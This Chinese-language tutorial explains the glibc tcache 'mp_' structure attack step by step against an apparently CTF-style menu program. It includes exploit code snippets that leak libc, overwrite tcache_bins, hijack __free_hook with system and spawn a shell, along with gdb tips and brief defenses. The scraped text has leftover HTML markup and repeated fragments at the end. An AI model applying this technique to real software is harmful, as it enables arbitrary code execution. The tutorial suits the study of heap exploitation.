Tcache攻击之mp_结构体攻击详解<\/h1>

1. 攻击原理概述<\/h2>
mp_结构体攻击是一种针对glibc堆管理机制的利用技术，核心在于修改`mp_.tcache_bins<\/code>的值，使得本不应进入tcache bin的大chunk能够被放入tcache，从而开展后续攻击。<\/p>`

关键机制：<\/h3>

当mp_.tcache_bins<\/code>足够大时，大chunk可以放入tcache bin<\/li>
大chunk的地址(链表头)会被存放在相邻的chunk中<\/li>
如果相邻chunk可控，可以覆盖该地址为free_hook<\/code>等关键地址<\/li>
通过写入one_gadget<\/code>或system<\/code>等函数地址实现getshell<\/li>
<\/ul>
2. mp_结构体关键成员<\/h2>
mp_结构体是glibc中管理内存分配参数的全局变量，位于libc数据段。关键成员包括：<\/p>
struct<\/span> malloc_par {
<\/span><\/span>    \/\/ ...其他成员
<\/span><\/span><\/span><\/span>    size_t tcache_bins;    \/\/ 控制哪些大小的chunk可以进入tcache
<\/span><\/span><\/span><\/span>    \/\/ ...其他成员
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>
tcache_bins<\/code>默认值为64，意味着只有大小在0x20-0x410的chunk可以进入tcache<\/li>
修改此值可以扩大tcache的适用范围<\/li>
<\/ul>
3. 攻击步骤详解<\/h2>
3.1 泄露libc基址<\/h3>

申请多个大chunk(大于tcache范围，如0x500)<\/li>
释放其中一个chunk进入unsorted bin<\/li>
重新申请该chunk，利用unsorted bin残留指针泄露main_arena地址<\/li>
计算libc基址<\/li>
<\/ol>
add(0x500<\/span>, b<\/span>'a'<\/span>)      # chunk 0<\/span>
<\/span><\/span>add(0x500<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>) # chunk 1<\/span>
<\/span><\/span>add(0x500<\/span>, b<\/span>'b'<\/span>)      # chunk 2<\/span>
<\/span><\/span>add(0x500<\/span>, b<\/span>'c'<\/span>)      # chunk 3<\/span>
<\/span><\/span>add(0xa0<\/span>, b<\/span>'top'<\/span>)     # chunk 4 (防止合并)<\/span>
<\/span><\/span>
<\/span><\/span>dele(2<\/span>)               # 释放chunk 2进入unsorted bin<\/span>
<\/span><\/span>add(0x500<\/span>, b<\/span>'z'<\/span>*<\/span>8<\/span>)    # 重新申请chunk 2，触发指针残留<\/span>
<\/span><\/span>show(5<\/span>)               # 泄露libc地址<\/span>
<\/span><\/span><\/code><\/pre>3.2 定位并修改mp_结构体<\/h3>

计算mp_结构体地址：mp = libc_base + 0x1ec280 + 0x50<\/code>

0x1ec280<\/code>是mp_结构体相对于libc的偏移<\/li>
+0x50<\/code>是tcache_bins<\/code>成员在结构体中的偏移<\/li>
<\/ul>
<\/li>
使用edit功能将mp_.tcache_bins<\/code>修改为666666<\/li>
<\/ol>
edit(p64(mp))         # 修改mp_.tcache_bins为666666<\/span>
<\/span><\/span><\/code><\/pre>3.3 利用修改后的tcache机制<\/h3>

释放一个大chunk(如chunk 3)，此时它会尝试进入tcache<\/li>
由于tcache_bins<\/code>被扩大，大chunk可以进入tcache<\/li>
该chunk的地址会被存储在相邻chunk(通常是chunk 0)的特定位置<\/li>
<\/ol>
dele(3<\/span>)               # 释放chunk 3，其地址会被存储在chunk 0中<\/span>
<\/span><\/span>dele(0<\/span>)               # 释放chunk 0以便重新控制<\/span>
<\/span><\/span><\/code><\/pre>3.4 劫持控制流<\/h3>

重新申请chunk 0，覆盖其内容为free_hook<\/code>地址<\/li>
再申请chunk 3，将其内容覆盖为system<\/code>地址<\/li>
此时调用free<\/code>实际会调用system<\/code><\/li>
<\/ol>
add(0x500<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>*<\/span>0x68<\/span> +<\/span> p64(free_hook)) # chunk 0<\/span>
<\/span><\/span>add(0x500<\/span>, p64(system))                  # chunk 3<\/span>
<\/span><\/span><\/code><\/pre>3.5 触发shell<\/h3>

由于chunk 1中已写入\/bin\/sh\x00<\/code><\/li>
释放chunk 1会触发system("\/bin\/sh")<\/code><\/li>
<\/ol>
dele(1<\/span>)               # 触发system("\/bin\/sh")<\/span>
<\/span><\/span><\/code><\/pre>4. 关键点总结<\/h2>

chunk大小选择<\/strong>：必须大于默认tcache范围(>0x410)，通常选择0x500<\/li>
libc泄露<\/strong>：利用unsorted bin的指针残留特性<\/li>
mp_结构体定位<\/strong>：需要知道libc中mp_结构体和tcache_bins的偏移<\/li>
地址存储机制<\/strong>：大chunk的tcache链表头会存储在相邻chunk中<\/li>
控制流劫持<\/strong>：通过覆盖相邻chunk内容实现任意地址写<\/li>
<\/ol>
5. 防御措施<\/h2>

更新glibc版本，修复相关漏洞<\/li>
使用堆保护机制如FORTIFY_SOURCE<\/li>
限制对关键内存区域的写操作<\/li>
实现堆隔离，防止关键数据结构被篡改<\/li>
<\/ol>
6. 实际调试技巧<\/h2>

使用gdb查看mp_结构体：
p mp_
x\/20gx &mp_
<\/code><\/pre>
<\/li>
检查tcache_bins值：
p mp_.tcache_bins
<\/code><\/pre>
<\/li>
跟踪chunk释放过程：
break _int_free
<\/code><\/pre>
<\/li>
检查free_hook状态：
p __free_hook
<\/code><\/pre>
<\/li>
<\/ol>
通过以上步骤和技巧，可以完整实现mp_结构体攻击，并深入理解其工作原理。<\/p>

Tcache攻击之mp_结构体攻击详解<\/h1>

1. 攻击原理概述<\/h2> mp_结构体攻击是一种针对glibc堆管理机制的利用技术，核心在于修改mp_.tcache_bins<\/code>的值，使得本不应进入tcache bin的大chunk能够被放入tcache，从而开展后续攻击。<\/p>

3. 攻击步骤详解<\/h2>

1. 攻击原理概述<\/h2>
mp_结构体攻击是一种针对glibc堆管理机制的利用技术，核心在于修改`mp_.tcache_bins<\/code>的值，使得本不应进入tcache bin的大chunk能够被放入tcache，从而开展后续攻击。<\/p>`